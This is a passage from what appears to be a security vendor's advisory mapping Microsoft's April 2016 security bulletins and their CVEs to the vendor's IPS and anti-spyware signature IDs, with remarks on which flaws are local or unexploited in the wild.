    IPS: 11552 “Microsoft Edge Memory Corruption Vulnerability (MS16-038) 4”

MS16-039 Security Update for Microsoft Graphics Component

  • CVE-2016-0143 Win32k Elevation of Privilege Vulnerability
    This is a local vulnerability.
  • CVE-2016-0145 Graphics Memory Corruption Vulnerability
    There are no known exploits in the wild.
  • CVE-2016-0165 Win32k Elevation of Privilege Vulnerability
    SPY:4357 “Malformed-File exe.MP.11”
  • CVE-2016-0167 Win32k Elevation of Privilege Vulnerability
    This is a local vulnerability.

MS16-040 Security Update for Microsoft XML Core Services

  • CVE-2016-0147 MSXML Remote Code Execution Vulnerability
    IPS: 11548 "MSXML Remote Code Execution Vulnerability (MS16-039)1"

MS16-041 Security Update for .NET Framework

  • CVE-2016-0148 .NET Framework Remote Code Execution Vulnerability
    There are no known exploits in the wild.

MS16-042 Security Update for Microsoft Office

  • CVE-2016-0122 Microsoft Office Memory Corruption Vulnerability
    There are no known exploits in the wild.
  • CVE-2016-0127 Microsoft Office Memory Corruption Vulnerability
    SPY:4336 “Malformed-File rtf.MP.13”
  • CVE-2016-0136 Microsoft Office Memory Corruption Vulnerability
    IPS:11258 “Malformed Excel Document 1”
  • CVE-2016-0139 Microsoft Office Memory Corruption Vulnerability
    SPY:4335 "Malformed-File xls.MP.52"

MS16-044 Security Update for Windows OLE

  • CVE-2016-0153 Windows OLE Remote Code Execution Vulnerability
    SPY:4491 "Malformed-File doc.MP.36"

MS16-045 Security Update for Windows Hyper-V

  • CVE-2016-0088 Hyper-V Remote Code Execution Vulnerability
    There are no known exploits in the wild.
  • CVE-2016-0089 Windows OLE Memory Remote Code Execution Vulnerability
    There are no known exploits in the wild.
  • CVE-2016-0090 Hyper-V Information Disclosure Vulnerability
    There are no known exploits in the wild.

MS16-046 Security Update for Secondary Logon

  • CVE-2016-0135 Secondary Logon Elevation of Privilege Vulnerability
    IPS: 11554 “Windows Secondary Logon Elevation of Privilege Vulnerability”

MS16-047 Security Update for SAM and LSAD Remote Protocols

  • CVE-2016-0128 Windows RPC Downgrade Vulnerability
    IPS: 11555 “DCERPC AuthLevel Downgrade (Windows)”

MS16-048 Security Update for CSRSS

  • CVE-2016-0151 Windows CSRSS Security Feature Bypass Vulnerability
    SPY:4358 "Malformed-File exe.MP.12"

MS16-049 Security Update for HTTP.sys

  • CVE-2016-0150 HTTP.sys Denial of Service Vulnerability
    There are no known exploits in the wild.